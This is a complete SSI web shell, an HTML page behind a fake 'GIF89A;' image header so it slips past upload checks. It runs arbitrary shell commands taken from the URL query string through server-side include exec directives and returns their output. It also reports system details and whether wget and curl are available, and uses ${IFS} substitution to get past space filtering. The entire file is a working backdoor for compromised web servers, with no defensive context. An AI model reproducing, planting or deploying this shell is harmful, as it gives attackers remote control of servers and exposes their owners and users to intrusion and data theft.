GIF89A;
<!--#config errmsg="[ERROR] SSI DISABLED"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="id" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!DOCTYPE html>
<html>
<head>
<title>SSI SHELL</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script language="javascript">
function opetcmd()
{
  var uri = document.getElementById('command').value;
    var rep = uri.replace(/[ ]/g,'${IFS}');
    var res = encodeURI(uri);
    document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
}
</script>
<style type="text/css">
body {
        text-shadow:0px 0px 1px #757575;
        background-color: #250A80;
        background-size: cover;
        background-attachment: fixed;
        background-repeat: no-repeat;
    }
.directory-listing-table{margin:auto;background:rgba(0,0,0,.8);padding:.9rem 4rem;max-width:900px;right:0;left:0;width:100%;border-radius:.4rem;box-shadow:1px 1px 0 rgba(0,0,0,.7),2px 2px 0 rgba(0,0,0,.7),3px 3px 0 rgba(0,0,0,.7),4px 4px 0 rgba(0,0,0,.7),5px 5px 0 rgba(0,0,0,.7),6px 6px 0 rgba(0,0,0,.7)}
    thead, tr, td {
        border-collapse:collapse;
        background: transparent;
        font-size: 13px;
        color: #fff;
    }
    input[type=text] {
        width: 50%;  
        background: rgba(0,0,0,0.3);
        border: none;
        outline: none;
        padding: 5px;
        font-size: 12px;
        color: #fff;
        text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
        border: 1px solid rgba(0,0,0,0.3);
        border-radius: 4px;
        box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
        -webkit-transition: box-shadow .5s ease;
        -moz-transition: box-shadow .5s ease;
        -o-transition: box-shadow .5s ease;
        -ms-transition: box-shadow .5s ease;
        transition: box-shadow .5s ease;
    }
    .pencet {
        background-color: rgb(0 0 0 / 57%);
        color: #fff;
        border-color: blanchedalmond;
    }
    ::selection {
    background: #4900f1;
    color: #fff;
    }
textarea {
    border: 1px solid #ffffff;
    width: 100%;
    height: 340px;
    padding-left: 2px;
    resize: none;
    overflow: auto;
    color: #fff;
    text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
    border: 1px solid rgba(0,0,0,0.3);
    border-radius: 4px;
    box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
    -webkit-transition: box-shadow .5s ease;
    -moz-transition: box-shadow .5s ease;
    -o-transition: box-shadow .5s ease;
    -ms-transition: box-shadow .5s ease;
    transition: box-shadow .5s ease;
    background: rgba(0,0,0,0.3);
}
textarea::-webkit-scrollbar{width:12px}textarea::-webkit-scrollbar-track{background:#000}textarea::-webkit-scrollbar-thumb{background-color:#4900f1;border:3px solid #000}
body, a, a,:link{cursor:url(https://cur.cursors-4u.net/anime/ani-8/ani762.cur), 
    default;
} 
    button, input, select, a:hover {
    cursor:url(https://cur.cursors-4u.net/anime/ani-8/ani762.cur), 
    wait;
}
</style>
</head>
<table class="directory-listing-table"><thead><td>
  <font face="courier">
    <br><br>System : <b><font color="orange"><!--#exec cmd="{uname,-nrv}" --></font></b>
    <br>Software : <b><font color="orange"><!--#echo var="SERVER_SOFTWARE" --></font></b>
    <br>Server Ip : <b><font color="orange"><!--#echo var="SERVER_ADDR" --></font></b>
    <br>Current Dir : <b><font color="orange"><!--#echo var=DOCUMENT_ROOT --></font></b><br>
Wget : <b><font color="orange"><!--#exec cmd="{test,-e,/usr/bin/wget}&&{echo,ON}||{echo,OFF}" --></font></b> |
Curl : <b><font color="orange"><!--#exec cmd="{test,-e,/usr/bin/curl}&&{echo,ON}||{echo,OFF}" --></font></b>
<br><br>
    <input type="text" size="30" placeholder="whoami" id="command" class="text" name="address1" style="max-width: 100%; max-height: 100%;">&nbsp;
    <br><br><button class="pencet" style="width:120px;height:30px;" id="crot" onclick="opetcmd();">EXECUTE</button><br><br>
Command : </font><b><font face="courier" color="orange" id="cmd"><!--#echo var=shl --></font></b></i>
<pre><textarea style="color:lime;" readonly><!--#exec cmd=$shl --></textarea></pre>
<script>
  var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" ");
    document.getElementById("cmd").innerHTML = cmd;
    var gaskan = document.getElementById("command");
    gaskan.addEventListener("keyup", function(event) {
      if (event.keyCode === 13) {
        event.preventDefault();
        document.getElementById("crot").click();
    }
});
</script>
</td></thead></table><br>
<table class='directory-listing-table'><thead><td><center><font face="courier" size="2">Created By Chloe &copy; 2024 - <a href='https://chloethesis.github.io/' target='_blank'></font><font size="2" color="orange">https://chloethesis.github.io/</font></a></center></td></thead></table>
</center></td></thead></table>
</html>
